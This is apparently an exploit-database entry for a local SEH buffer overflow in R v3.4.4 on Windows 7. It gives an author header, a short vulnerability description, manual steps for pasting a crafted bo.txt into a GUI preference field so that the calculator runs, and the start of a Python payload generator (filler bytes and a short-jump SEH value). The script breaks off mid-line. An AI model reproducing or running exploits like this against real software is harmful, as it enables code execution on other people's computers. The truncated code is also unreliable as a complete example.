#--------------------------------------------------------# #Exploit Title: R v3.4.4 - (SEH) Buffer Overflow Exploit #Exploit Author : ZwX #Exploit Date: 2018-08-22 #Vendor Homepage : https://www.r-project.org/ #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: msk4@live.fr #Website: http://zwx-pentester.fr/ #--------------------------------------------------------# #Technical Details & Description: #================================ '''A local buffer overflow vulnerability has been discovered in the official R v3.4.4 software. The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is marked as classic buffer overflow issue''' # Manual steps to reproduce the vulnerability: under GUI preferences # paste bo.txt contents into 'Language for menus and messages' click ok --> Now the calculator executes! #!/usr/bin/python from struct import pack buffer = "x41" * 900 a = "\xeb\x14\x90\x90" b = pack("